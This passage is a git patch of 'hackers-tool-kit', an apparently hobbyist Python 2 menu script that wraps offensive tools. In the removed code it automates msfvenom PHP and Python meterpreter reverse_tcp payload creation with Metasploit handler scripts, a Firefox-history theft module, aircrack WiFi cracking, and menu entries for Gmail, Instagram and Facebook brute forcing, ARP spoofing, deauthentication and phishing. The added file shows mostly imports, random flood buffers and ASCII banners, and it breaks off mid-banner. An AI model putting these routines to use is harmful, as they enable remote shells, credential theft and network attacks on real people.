= 'aircrack-ng -b {0} -e {1} -w {2} {3} {4}' - os.system(a) -#-------------------------------------# -#AIRCRACK-NG [WIFI HACK] AUTOMATED END# - - -#GET SOURCE CODE OF WEB START# -#----------------------------# -def source(): - t = raw_input(B+"Target:\033[0m ") - print Y+"\nWould you like to save source code in a file?\n\033[0m" - q = raw_input(R+"[y/n]:\033[0m ") - if q == "n": - an = 'curl {0}'.format(t) - os.system(an) - if q == "y": - ay = 'curl {0} >> /root/{1}.txt'.format(t,t) - os.system(ay) - print Y+"\nfile saved > /root/{0}.txt\033[0m".format(t) -#--------------------------# -#GET SOURCE CODE OF WEB END# - - -#WEB DIRECTORY SCAN START# -#------------------------# -def dirscan(): - t = raw_input(B+"Target URL:\033[91m ") - print "\033[0m" - a = 'dirb {0}'.format(t) - os.system(a) -#----------------------# -#WEB DIRECTORY SCAN END# - - - -#APACHE SERVER START# -#-------------------# -def aserver(): - gw = os.popen("ip -4 route show default").read().split() - s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) - s.connect((gw[2], 0)) - ipaddr = s.getsockname()[0] - print Y+"Starting Server\033[0m..." - os.system("service apache2 start") - br = raw_input(G+"Browser: \033[0m") - a = '{0} {1}'.format(br,ipaddr) - os.system(a) - stop = raw_input("hit enter to stop server: ") - print Y+"Stopping Server\033[0m..." - os.system("service apache2 stop") -#-----------------# -#APACHE SERVER END# - - -#CLEAR ALL START# -#---------------# -def clearall(): - os.system("clear") -#-------------# -#CLEAR ALL END# - - -#RUN A FILE START# -#----------------# -def run(): - print Y+"what program do you want to run the file with Example: python" - p = raw_input(N+"Program: ") - print "\n" - print Y+"Example 1: /root/hi/hello.py/ \033[94mExample 2: hello.py\033[0m" - print "\n" - f = raw_input("Enter File: ") - print "\n" - print Y+"would you like to add arguments when running the file [y/n]\033[0m" - yn = raw_input(G+"[y or n]: \033[0m") - if yn == "n" : - a = '{0} {1}'.format(p,f) - os.system(a) - if yn == "y" : - arg = raw_input("Enter Arguments: ") - a = '{0} {1} {2}'.format(p,f,arg) - os.system(a) -#--------------# -#RUN A FILE END# - - -#REFRESH BANNER START# -#--------------------# -def banner(): - os.system("clear") - mainbanner() -#------------------# -#REFRESH BANNER END# - - -#PHP PAYLOAD START# -#-----------------# -def phpload(): - lhost = raw_input("LHOST: ") - lport = raw_input("LPORT: ") - filen = raw_input("File Name: ") - a = 'msfvenom -p php/meterpreter/reverse_tcp LHOST={0} LPORT={1} -o /root/{2}.php'.format(lhost,lport,filen) - os.system(a) - print "\nwould you like to run this file in a multi handler?" - yn = raw_input("[y/n]> ") - if yn == "y": - os.system('echo "use exploit/multi/handler\n" >> phpload.rc') - os.system('echo "set payload php/meterpreter/reverse_tcp\n" >> phpload.rc') - os.system('echo "set LHOST {0}\n" >> phpload.rc'.format(lhost)) - os.system('echo "set LPORT {0}\n" >> phpload.rc'.format(lport)) - os.system('echo "exploit\n" >> phpload.rc') - os.system("service postgresql restart") - os.system('msfconsole -r phpload.rc') - os.system('rm -rf phpload.rc') - if yn == "n": - os.system('echo " "') -#---------------# -#PHP PAYLOAD END# - - -#PYLOAD START# -#------------# -def pyload(): - lhost = raw_input("LHOST: ") - lport = raw_input("LPORT: ") - filen = raw_input("File Name: ") - a = 'msfvenom -p python/meterpreter/reverse_tcp LHOST={0} LPORT={1} -o /root/{2}.py'.format(lhost,lport,filen) - os.system(a) - print "\nwould you like to run this file in a multi handler?" - yn = raw_input("[y/n]> ") - if yn == "y": - os.system('echo "use exploit/multi/handler\n" >> pyload.rc') - os.system('echo "set payload python/meterpreter/reverse_tcp\n" >> pyload.rc') - os.system('echo "set LHOST {0}\n" >> pyload.rc'.format(lhost)) - os.system('echo "set LPORT {0}\n" >> pyload.rc'.format(lport)) - os.system('echo "exploit\n" >> pyload.rc') - os.system("service postgresql restart") - os.system('msfconsole -r pyload.rc') - os.system('rm -rf pyload.rc') - if yn == "n": - os.system('echo " "') -#----------# -#PYLOAD END# - - -#FOXHIS START# -#------------# -def foxhis(): - os.system('echo "sessions\n" >> foxhisses.rc') - os.system('echo "exit\n" >> foxhisses.rc') - os.system("service postgresql restart") - os.system('msfconsole -q -r foxhisses.rc') - os.system('rm -rf foxhisses.rc') - print "\n" - ses = raw_input("Session: ") - print "\nMaximum time (seconds) to wait for a response\n" - time = raw_input("Timeout: ") - os.system('echo "use firefox/gather/history\n" >> foxhis.rc') - os.system('echo "set session {0}\n" >> foxhis.rc'.format(ses)) - os.system('echo "set timeout {0}\n" >> foxhis.rc'.format(time)) - os.system('echo "run\n" >> foxhis.rc') - os.system('msfconsole -q -r foxhis.rc') - os.system('rm -fr foxhis.rc') -#----------# -#FOXHIS END# - - -#RHAWK START# -#-----------# -def rhawk(): - os.system("cd /root/hackers-tool-kit/redhawk/ && php rhawk.php") -#---------# -#RHAWK END# - - -#NANO START# -#----------# -def nano(): - print "opening nano in \033[93m/root/\033[0m folder" - os.system("sleep 2") - os.system("cd /root/ && nano") -#--------# -#NANO END# - - -#UPDATE HACKERS-TOOL-KIT START# -#-----------------------------# -def update(): - os.system("cd /root/hackers-tool-kit/ && python htkupdate.py") -#---------------------------# -#UPDATE HACKERS-TOOL-KIT END# - - -#THIS IS THE MAIN PART OF THE SCRIPT LIKE WHERE YOU TYPE WHERE IT RUNS THE COMMANDS SHIT LIKE THAT# -#-------------------------------------------------------------------------------------------------# -def main(): - found = False - while not found: - x = raw_input(N+'\033[91m[\033[0mh-\033[94mT\033[0m-k\033[91m]\033[94m->\033[92m: \033[0m') - if x == "?": - help() - if x == "winload" : - winload() - if x == "clear" : - os.system("clear") - mainbanner() - if x == "andload": - andload() - if x == "command": - c = raw_input("Command: ") - os.system(c) - if x == "msfcon" : - os.system("service postgresql start") - os.system("msfconsole") - if x == "set": - os.system("setoolkit") - if x == "msfven": - print R+"!ONLY TYPE THE ARGUMENTS DONT TYPE MSFVENOM\033[0m" - v = raw_input(G+"MSFVENOM: \033[0m") - os.system("msfvenom", v) - if x == "gmail" : - gmail() - if x == "insta": - insta() - if x == "fb" : - fb() - if x == "ipgrab": - ipgrab() - if x == "myip": - myip() - if x == "wifite": - wifite() - if x == "mon" : - mon() - if x == "netdev" : - netdev() - if x == "scannet": - scannet() - if x == "exit" : - import sys - print "follow \033[92m@tuf_unkn0wn\033[0m on instagram" - sys.exit() - if x == "rebootl": - print R+"! ARE YOU SURE YOU WANT TO REBOOT YOUR WHOLE DEVICE !\033[0m" - c = raw_input("[y/n]> ") - if c == "y" : - os.system("reboot") - if c == "n" : - os.system("clear") - mainbanner() - main() - if x == "port": - port() - if x == "info": - info() - if x == "sysinfo": - sysinfo() - if x == "msfex": - msfex() - if x == "udp": - udp() - if x == "tcp": - tcp() - if x == "syn": - syn() - if x == "msfpa": - msfpa() - if x == "msfau": - msfau() - if x == "ping" : - ping() - if x == "multih": - multih() - if x == "msfall": - msfall() - if x == "hydra" : - hydra() - if x == "cupp": - cupp() - if x == "vdir": - vdir() - if x == "monoff": - monoff() - if x == "vpn": - vpn() - if x == "vpnoff": - vpnoff() - if x == "slowl": - slowl() - if x == "pidox": - pidox() - if x == "specnet": - specnet() - if x == "pingen": - pingen() - if x == "reaver": - reaver() - if x == "deauth": - deauth() - if x == "macc": - macc() - if x == "macoff": - macoff() - if x == "arpspoof": - arpspoof() - if x == "sslscan": - sslscan() - if x == "payload": - payload() - if x == "crunch": - crunch() - if x == "traff": - traff() - if x == "resa": - resa() - if x == "resu": - resu() - if x == "hashid": - hashid() - if x == "restart": - restart() - if x == "medusa": - medusa() - if x == "wafwoof": - wafwoof() - if x == "cloud": - cloud() - if x == "brutex": - brutex() - if x == "methelp": - methelp() - if x == "winbyp": - winbyp() - if x == "exploit": - exploit() - if x == "phish": - phish() - if x == "datalist": - datalist() - if x == "msfev": - msfev() - if x == "upgrade": - upgrade() - if x == "nscript": - nscript() - if x == "sshver": - sshver() - if x == "chains": - chains() - if x == "mysqlv": - mysqlv() - if x == "connect": - connect() - if x == "terminal": - terminal() - if x == "aircrack": - aircrack() - if x == "source": - source() - if x == "dirscan": - dirscan() - if x == "aserver": - aserver() - if x == "clearall": - clearall() - if x == "run": - run() - if x == "banner": - banner() - if x == "phpload": - phpload() - if x == "pyload": - pyload() - if x == "foxhis": - foxhis() - if x == "rhawk": - rhawk() - if x == "nano": - nano() - if x == "update": - update() - found = True -mainbanner() -main() -#-------------------------------------------------------------------------------------------------# -#THIS IS THE MAIN PART OF THE SCRIPT LIKE WHERE YOU TYPE WHERE IT RUNS THE COMMANDS SHIT LIKE THAT# From 02bddeedbc9de50831e069d56994da62c852866e Mon Sep 17 00:00:00 2001 From: tuf_unkn0wn <40415158+unkn0wnh4ckr@users.noreply.github.com> Date: Mon, 3 Jun 2019 02:15:21 +0100 Subject: [PATCH 172/214] Add files via upload --- htk.py | 3223 ++++++++++++++++++++++++++++++++++++++++++++++++++++++++ 1 file changed, 3223 insertions(+) create mode 100644 htk.py diff --git a/htk.py b/htk.py new file mode 100644 index 0000000..acae217 --- /dev/null +++ b/htk.py @@ -0,0 +1,3223 @@ +#!/usr/local/bin/python +# coding: latin-1 +#if you use this code give me credit @tuf_unkn0wn +#i do not give you permission to show / edit this script without my credit +#to ask questions or report a problem message me on instagram @unkn0wn_bali +""" + + + ██░ ██ ▄▄▄ ▄████▄ ██ ▄█▀▓█████ ▓█████▄ +▓██░ ██▒▒████▄ ▒██▀ ▀█ ██▄█▒ ▓█ ▀ ▒██▀ ██▌ +▒██▀▀██░▒██ ▀█▄ ▒▓█ ▄ ▓███▄░ ▒███ ░██ █▌ +░▓█ ░██ ░██▄▄▄▄██ ▒▓▓▄ ▄██▒▓██ █▄ ▒▓█ ▄ ░▓█▄ ▌ +░▓█▒░██▓ ▓█ ▓██▒▒ ▓███▀ ░▒██▒ █▄░▒████▒░▒████▓ + ▒ ░░▒░▒ ▒▒ ▓▒█░░ ░▒ ▒ ░▒ ▒▒ ▓▒░░ ▒░ ░ ▒▒▓ ▒ + ▒ ░▒░ ░ ▒ ▒▒ ░ ░ ▒ ░ ░▒ ▒░ ░ ░ ░ ░ ▒ ▒ + ░ ░░ ░ ░ ▒ ░ ░ ░░ ░ ░ ░ ░ ░ + ░ ░ ░ ░ ░░ ░ ░ ░ ░ ░ ░ + ░ ░ + + +""" +#WARNING START# +#-------------# +from tkinter import * +win = Tk() +warn ='I AM NOT RESPONSIBLE FOR ANY DAMAGE CAUSED WITH THIS TOOL WHATEVER YOU DO WITH THIS TOOL IS ON YOU' +messageVar = Message(win, text = warn) +messageVar.config(bg='red') +messageVar.pack( ) +win.title('HTK: Warning!') +button = Button(win, text='OK', width=25, command=win.destroy) +button.pack() +win.mainloop() +#-----------# +#WARNING END# + +#this is the loading screen \ the imports START# +#----------------------------------------------# +import os +print "Starting hackers-tool-kit... [ * ]-[0%]" +import platform +os.system("clear") +print "Starting hackers-tool-kit... [ *]-[5%]" +import webbrowser +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[9%]" +import hashlib +os.system("clear") +print "Starting hackers-tool-kit... [* ]-[14%]" +import subprocess +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[19%]" +import zipfile +os.system("clear") +print "Starting hackers-tool-kit... [ *]-[23%]" +import colorama +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[25%]" +from modules import * +os.system("clear") +print "Starting hackers-tool-kit... [* ]-[26%]" +import modules.colors +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[27%]" +import builtwith +os.system("clear") +print "Starting hackers-tool-kit... [ *]-[29%]" +from urllib2 import urlopen +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[31%]" +from urllib2 import URLError +os.system("clear") +print "Starting hackers-tool-kit... [* ]-[34%]" +from urllib2 import HTTPError +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[38%]" +from urllib import urlencode +os.system("clear") +print "Starting hackers-tool-kit... [* ]-[39%]" +from plugins.DNSDumpsterAPI import DNSDumpsterAPI +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[41%]" +import whois +os.system("clear") +print "Starting hackers-tool-kit... [ *]-[45%]" +import json +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[47%]" +from urlparse import urlparse +os.system("clear") +print "Starting hackers-tool-kit... [* ]-[50%]" +from re import search, sub +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[55%]" +import cookielib +os.system("clear") +print "Starting hackers-tool-kit... [ *]-[56%]" +import socket +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[59%]" +from scapy.all import * +os.system("clear") +print "Starting hackers-tool-kit... [* ]-[60%]" +from threading import Thread, active_count +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[63%]" +import random +os.system("clear") +print "Starting hackers-tool-kit... [ *]-[67%]" +import string +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[70%]" +import signal +os.system("clear") +print "Starting hackers-tool-kit... [* ]-[73%]" +import ssl +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[79%]" +import argparse +os.system("clear") +print "Starting hackers-tool-kit... [ *]-[83%]" +import sys +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[86%]" +import socks +os.system("clear") +print "Starting hackers-tool-kit... [* ]-[89%]" +import mechanize +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[90%]" +import requests +os.system("clear") +print "Starting hackers-tool-kit... [ *]-[94%]" +import time +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[96%]" +from datetime import datetime +now = datetime.now() +hour = now.hour +minute = now.minute +day = now.day +month = now.month +year = now.year +os.system("clear") +print "Starting hackers-tool-kit... [* ]-[99%]" +sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) +Gb = random._urandom(20000) +bytes = random._urandom(20000) +Kb = random._urandom(20000) +#COLOR VARIABLES START# +#---------------------# +r = '\033[31m' +W = '\033[90m' +R = '\033[91m' +N = '\033[0m' +G = '\033[92m' +B = '\033[94m' +Y = '\033[93m' +LB = '\033[1;36m' +P = '\033[95m' +Bl = '\033[30m' +O = '\033[33m' +p = '\033[35m' +#-------------------# +#COLOR VARIABLES END# + +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[100%] \033[92m READY\033[0m" +os.system("printf '\033]2;Hackers-Tool-Kit | HTK | @tuf_unkn0wn\a'") +os.system("service tor start") +os.system("service postgresql start") +os.system("clear") +#----------------------------------------------# +#this is the loading screen \ the imports END# + + +#MAIN STARTING BANNER START# +#--------------------------# +def mainbanner1(): + os.system("cat /root/hackers-tool-kit/tools/htkbanner.txt | lolcat") + print N+"""\033[34m + .............. \033[0mtype ? for help\033[34m + ..,;:ccc,. + ......''';lxO. + .....''''..........,:ld; + .';;;:::;,,.x, + ..'''. 0Xxoc:,. ... + .... ,ONkc;,;cokOdc',. + . OMo ':ddo. + dMc :OO; + 0M. .:o. + ;Wd + ;XO, \033[93mCreated By @tuf_unkn0wn On Instagram\033[34m + ,d0Odlc;,.. + ..',;:cdOOd::,. + .:d;.':;. + 'd, .' + ;l .. + .o + c + .' + .\033[92m + ▄▄ ▄▄ ▄▄▄▄▄▄▄▄ ▄▄ ▄▄▄ + ██ ██ ▀▀▀██▀▀▀ ██ ██▀ + ██ ██ ██ ██▄██ + ████████ ██ █████ + ██ ██ █████ ██ █████ ██ ██▄ + ██ ██ ██ ██ ██▄ + ▀▀ ▀▀ ▀▀ ▀▀ ▀▀\033[0m + ▒ ░░▒░▒▒ ▓▒█░░ ░▒ ▒░▒ ▒▒ ▓▒░░▒ ░ ▒▓ ░▒▓ + ▒ ░▒░ ░ ▒▒ ░ ░ ▒ ░ ░▒ ▒░ ░░ ░▒ ░ ▒ + ░ ░░ ░ ▒ ░ ░ ░░ ░ ░ ░░ ░ + ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ + """.decode('utf-8') +def mainbanner2(): + print """ + type ? for help +\033[92m + ▄█ ▄█ ▄█ + ███ ███ ███ + ███▌ ███▌ ███▌ + ███▌ ███▌ ███▌ + ███▌ ███▌ ███▌ + ███ ███ ███ + ███ ███ ███ + █▀ █▀ █▀ + + ┬ ┬┌─┐┌─┐┬┌─┌─┐┬─┐┌─┐ + ├─┤├─┤│ ├┴┐├┤ ├┬┘└─┐\033[90m + ┴ ┴┴ ┴└─┘┴ ┴└─┘┴└─└─┘ + ┌┬┐┌─┐┌─┐┬ ┬┌─┬┌┬┐\033[92m + │ │ ││ ││───├┴┐│ │ + ┴ └─┘└─┘┴─┘ ┴ ┴┴ ┴ \033[0m +Created By @tuf_unkn0wn + """.decode('utf-8') +def mainbanner3(): + print """\033[91m + ▒\033[90m██ ██\033[91m▒ ▒\033[90m██ ██\033[91m▒ + ▒▒ \033[90m█ █ \033[91m▒░ ▒▒ \033[90m█ █ \033[91m▒░ + ░░ \033[90m█ \033[91m░ ░░ \033[90m█ \033[91m░ + ░ \033[90m█ █ \033[91m▒ ░ \033[90m█ █ \033[91m▒ + ▒\033[90m██\033[91m▒ ▒\033[90m██\033[91m▒ ▒\033[90m██\033[91m▒ ▒\033[90m██\033[91m▒ + ▒▒ ░ ░▓ ░ ▒▒ ░ ░▓ ░ + ░░ ░▒ ░ ░░ ░▒ ░ + ░ ░ ░ ░ + ░ ░ ░ ░ + \033[90m + + ████████████████████ + ██ ██\033[91m + ▒▒ ▒▒ + ░░ ░░ + ░ ░ + ░ ░\033[0m + +888 888 88888888888 888 d8P +888 888 888 888 d8P +888 888 888 888 d8P \033[1;36m +8888888888 888 888d88K +888 888 888 8888888b\033[0m +888 888 888888 888 888888 888 Y88b +888 888 888 888 Y88b +888 888 888 888 Y88b + Created By @tuf_unkn0wn On Instagram + type ? for help + """.decode('utf-8') +def mainbanner4(): + print P+""" + .S S. sdSS_SSSSSSbs .S S. + .SS SS. YSSS~S%SSSSSP .SS SS. + S%S S%S S%S S%S S&S + S%S S%S S%S S%S d*S + S%S SSSS%S S&S S&S .S*S + S&S SSS&S S&S S&S_sdSSS + S&S S&S S&S S&S~YSSY%b + S&S S&S S&S S&S `S% + S*S S*S S*S S*S S% + S*S S*S S*S S*S n& + S*S S*S S*S S*S wS& + SSS S*S S*S S*S 0 SS + h SP SP SP n + a Y Y Y k + c n + k e r s - t o o l - k i t by @tuf_u\033[0m + + type ? for help + """.decode('utf-8') +def mainbanner5(): + print R+""" + ██▀███ ▄▄▄ ▒███████▒ ▒█████ ██▀███ + ▓██ ▒ ██▒▒████▄ ▒ ▒ ▒ ▄▀░▒██▒ ██▒▓██ ▒ ██▒ + ▓██ ░▄█ ▒▒██ ▀█▄ ░ ▒ ▄▀▒░ ▒██░ ██▒▓██ ░▄█ ▒ + ▒██▀▀█▄ ░██▄▄▄▄██ ▄▀▒ ░▒██ ██░▒██▀▀█▄ + ░██▓ ▒██▒ ▓█ ▓██▒▒███████▒░ ████▓▒░░██▓ ▒██▒ + ░ ▒▓ ░▒▓░ ▒▒ ▓▒█░░▒▒ ▓░▒░▒░ ▒░▒░▒░ ░ ▒▓ ░▒▓░ + ░▒ ░ ▒░ ▒ ▒▒ ░░░▒ ▒ ░ ▒ ░ ▒ ▒░ ░▒ ░ ▒░ + ░░ ░ ░ ▒ ░ ░ ░ ░ ░░ ░ ░ ▒ ░░ ░ + ░ ░ ░ ░ ░ ░ ░ ░ + ░\033[0m + .,,,,,,,,,,.,,,.....,........................... + ...,...,....,.,..,......,,,,.......,.,,,,,,,.,,, + ..,......,.....,,.,........,,...........,,.,.... + ...,.,,.,....,,,,..,..,,,,,,......,,.,...,..../ + ***********************//***/***//**/********** + ****************** ****************** @tuf_unkn0wn + *,*****,*,******** ***,************** + **,,,,,,,,,,,,,,*,,,,, *,,,,,,,,,*,,,,,,,,,** type ? for help + ,,,,,,,,,,,,,,,,,,,,,,,*,,,,,,,,,,,,,,,,,,,,,,, + ,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, + ***********************************************\033[91m + + ▄████▄ █ ██ ▄▄▄█████▓ ██████ + ▒██▀ ▀█ ██ ▓██▒▓ ██▒ ▓▒▒██ ▒ + ▒▓█ ▄ ▓██ ▒██░▒ ▓██░ ▒░░ ▓██▄ + ▒▓▓▄ ▄██▒▓▓█ ░██░░ ▓██▓ ░ ▒ ██▒ + ▒ ▓███▀ ░▒▒█████▓ ▒██▒ ░ ▒██████▒▒ + ░ ░▒ ▒ ░░▒▓▒ ▒ ▒ ▒ ░░ ▒ ▒▓▒ ▒ ░ + ░ ▒ ░░▒░ ░ ░ ░ ░ ░▒ ░ ░ + ░ ░░░ ░ ░ ░ ░ ░ ░ + ░ ░ ░ ░ + ░ \033[0m + """.decode('utf-8') +def mainbanner6(): + print """ + |-|____________________ + /|_|_\ /__,''___ /____ /| + |\033[90mHHHHHH\033[0m| \_/ |\033[90mHHHHH\033[0m|/| + |``````|_________|`````| | + | \033[93m~~~~~~~~~~~~~~\033[0m | | + | .-/\-, | | + | _\\//_ | | + | \033[92m| /(_)|\033[0m | | + |\033[92m_______|_||.-.|_______\033[0m|/| + |\033[90mHHHHHHH\033[0m| ||:_ |\033[90mHHHHHHH\033[0m|/| + |\033[92m```````|_||:_)|```````\033[0m| | + | \033[92m|______| \033[0m| | + | ______ | | + | (__\033[90m24\033[0m__) | | + | ~~~~~~~~ | | + | By @tuf_unkn0wn | | + |______________________|/ + \033[91m + ) ( ) ( + ( /( )\ ) ( /( )\ ( ( ( + )\()|(_| /( ( )\()) ((_)))\ ( )\))( ( + ((_)\ _ )(_)) )\((_)\ _ /((_) )\ )((_))\ )\ + | |(_) ((_)_ ((_) |(_) | (_))( _(_/( (()(_|(_) + | '_ \ / _` / _|| / / | | || | ' \)) _` |(_-< + |_.__/_\__,_\__||_\_\ |_|\_,_|_||_|\__, |/__/ + |___/ + \033[90m + ) + (\033[33m + _ \033[0m___________ \033[90m)\033[33m + [_[\033[0m___________\033[91m#\033[0m + type ? for help + """.decode('utf-8') +def mainbanner7(): + os.system("cat /root/hackers-tool-kit/tools/skull.txt") +def mainbanner8(): + print """ + type ? for help\033[91m + +@@@ /$$ /$$ @@@ +@@@ | $$ | $$ @@@ +@@! | $$ | $$ @@! +!@! | $$$$$$$$ !@! +!!@ | $$__ $$ !!@ +!!! | $$ | $$ !!! +!!: | $$ | $$ !!: +:!: |__/ |__/ :!: +@@@ @@@\033[94m +@@@ @@@ +@@! @@! +!@! /$$$$$$$$ !@! +!!@ |__ $$__/ !!@ +!!! | $$ !!! +!!: | $$ !!: +:!:---------------| $$---------------:!: +@@@ | $$ @@@ +@@@ | $$ @@@ +@@! |__/ @@! +!@! !@!\033[91m +!!@ !!@ +!!! /$$ /$$ !!! +!!: | $$ /$$/ !!: +:!: | $$ /$$/ :!: +@@@ | $$$$$/ @@@ +@@@ | $$ $$ @@@ +@@! | $$\ $$ @@! +!@! | $$ \ $$ !@! +!!@ |__/ \__/ !!@ +!!! !!! +!!: !!: +:!: :!:\033[92m + :: :: +: @tuf_unkn0wn :\033[0m +""" +def mainbanner9(): + print """ +\033[91m╔\033[0m██████████████████████████████████████████████████████████████████\033[91m═╗ +║ ║ +\033[33m║ ║ +║\033[0m ▄▀▀▀▀▄ ▄▀▀▄ ▀▀▄ ▄▀▀▀▀▄ ▄▀▀▀█▀▀▄ ▄▀▀█▄▄▄▄ ▄▀▀▄ ▄▀▄ \033[33m║ +\033[93m║\033[0m █ █ ▐ █ ▀▄ ▄▀ █ █ ▐ █ █ ▐ ▐ ▄▀ ▐ █ █ ▀ █ \033[93m║ +║\033[0m ▀▄ ▐ █ ▀▄ ▐ █ █▄▄▄▄▄ ▐ █ █ \033[93m║ +\033[92m║\033[0m ▀▄ █ █ ▀▄ █ █ █ ▌ █ █ \033[92m║ +║\033[0m █▀▀▀ ▄▀ █▀▀▀ ▄▀ ▄▀▄▄▄▄ ▄▀ ▄▀ \033[92m║ +\033[1;36m║\033[0m ▐ █ ▐ █ █ ▐ █ █ \033[1;36m║ +║\033[0m ▐ ▐ ▐ ▐ ▐ \033[1;36m║ +\033[94m║\033[0m ▄▀▀█▄▄ ▄▀▀▀▀▄ ▄▀▀▄ ▄▀▀▄ ▄▀▀▄ ▀▄ \033[94m║ +║\033[0m █ ▄▀ █ █ █ █ █ ▐ █ █ █ █ █ \033[94m ║ +\033[34m║\033[0m ▐ █ █ █ █ ▐ █ █ ▐ █ ▀█ \033[34m║ +║\033[0m █ █ ▀▄ ▄▀ █ ▄ █ █ █ \033[34m║ +\033[95m║\033[0m ▄▀▄▄▄▄▀ ▀▀▀▀ ▀▄▀ ▀▄ ▄▀ ▄▀ █ \033[95m║ +║\033[0m █ ▐ ▀ █ ▐ \033[95m║ +\033[35m║\033[0m ▐ ▐ \033[35m║ +║ ║\033[1;31m +╚═\033[0m█████████████████████████████████████████████████████████████████\033[1;31m═╝\033[0m + type ? for help + """.decode('utf-8') + +def mainbanner10(): + print """\033[0m + ░░░▓█▒░▒▒▒▓▓░ + ░░░░░▓▓░▒▓▓▓▓▓▓▓▓▓▓▓█░░░░ + ░░█▒▒▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓░░ + ░░█▒▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓░░░ + ░░░░ ░░▒▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓██░░ ░░░░ + ░░░░░░░▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓████████▒░░ ░░▓▒▒▒▒▓░░ + ░▓░▒▒▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓██████████████████▓░░░░░▒▓▓▓▓▓▓███████ + ░░▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓█████████████████████████████████░░░░░░░ + ░░▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓█▓▓▓▓██████████████████████████████████░ + ░█▓▓▓██████████▓▓▓▓▓▓▓▓▓▓▓▓▓██████████████████████████████████▒░ + ░▒▓▓▓████░░░░░░░░░░░░░▒▓███████████████████████████████████████░░ + ░▓▓▓███▒▒░░░░░░░░░░░░░░░░░░░░▒██▓██████████████████████████████░░ + ░█▓▓███░░░░░░░░░░░░░░░░░░░░░░░░░░░▒███████████████████████████▓░ + ░█▓▓███▒░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░█████████████████░░░░░░░░░ + ░░▓▓████░░░░░░░░░░░░░░░░░░░░████▓░░░░░░░░█████████████▓░ + ░█▓█████░░░░░░░░░░░░░░░░░▒░████████░░░░░░░████████████░░ + ░░▒▓█████░░░░▒░▓████░░░░░░▒░█████████▓░░░░░███████████▓░░░░░ + ░░▓▒▓█████░░░▒░▓██████░░░░░▒░▓█████████░░░░░▒██████████░░▒▒▓░ + ░░█▒▓▓████▒░░░░███████▓░░░░░▒░░████████▓░░░░▒████████░▓░▓▓░▓▓░░░ + ░░░▒▓▓▓████░░░░▓██████▓░░░░░░▒░░░▓█████░░░░░███████▓░▓▓▓▓▓▓▒▒░░░ + ░▒▒▓▓████░░▒░░██████░░░░░░░░░▒░░░░░░▒░░░░░████▓░▒▓▓▓▓▓░░░▒▒▒░▒░ + ░░▓▓████░░░▒░░▒███░░▒▓▒▒█▓░░░░░░░░░░░░░▒██▓▒▓▓▓▓▓▓▒░░░░░░▒▒▒▒▒░░ + ░░░░████░░░░░░░░░░░░░█░░▓█▓░░░░██████████▒▒▓▓▓▓░░░░░▒░░░░░▒▒▒▒▒░ + ░░░░░░ ░░████░░░░░░░░░░░░░░░░░░░░░░███████▓▒▓▓░░░░░░░ ░░░░░░░▒▒▒░▒░ + ░▒░░▒░░░▒░▒█████▓▒░▒█░░░░░░░░░░░░░░░░███▓▒▓▒░░ ░▒░░░░▒▒▒░░░░ + ░░▒░▒░░░░░░░██████████░░░░░░▒░░░▒░░▒▒▒▒▒▒▒░░░ ░▒░░░░▒▒░▒░░ + ▒░░░░░▒▒▒░░░░░░██████░░▒▒▒▒▒▒▒▒▒▓█▓▓▒▒▓▓▓█░ ░░▒░░░░▒▒▒░░ + ░░░░░░▒▒░░░░ ░░▓▓▓▓▓▓▓█▓▓▒▒▓▓█▓▓▓▓▓█ \033[92m@tuf_unkn0wn\033[0m ░░░░░░░▒░░░ + ░░▒░░░░░▒▓█ ░▒▒▓▓▓▓█▓█▓▓▒▒▓▓██▓▓▓▓▓▓█ \033[94mtype ? for help\033[0m ░░░░░▒▒░░ + ░▒░░░░█▓██▒░▒▓▓██▓▒▒▒▒▓▒▓▓████▓▓▓▓▓██▒ ▒░░░░░▒░░ + ░░▓▒█▓▓▓▓▓▓▓██▓▒▒░▒▒▒▒█▓▓███▓▓▓▓▓▓█░ ▒░░░░▒░ + ░▒███▓▓▓▓▓▓▓▓▓▓▒▒▒▒▒▒▒░▒████▓▓▓▓▓▓▒░ ▒░░░░░ + ░████▓▓▓▓▓▓▓▒▓▓▓▓█▒▒░░▒░█▓█▓█▓████░ ▒░░▒░░ + ░▓██▓▓▓▓▓▒▓▓▓▓▓▓▓▓▓▓▓▓▒▒▓▓█▓▓▓▓██▒░ ░░▒░ + ░░██▓▓▒▓▓██▓▓▓▓▓▓▓▓▓████▓▓▓▓█▓▓█░░░ + ░██▓▓███▒▓▓▓▓▓▓▓▓▓█████▓██▓██░░ + ░░█▓█░░ ░▒▒▓▓▓▓▓▓▓▓▓███▓██▓█░ + ▓█░ ░█▓▓▓▓▓▓▓▓▓████▓███░ ░ + ░█▓▓▓▓▓▓███████▓██▓██░ + ░██▓▓▓████████████████░░░ + ░▓▓▓▓▓███████▓█▓████████░ ░░░ + 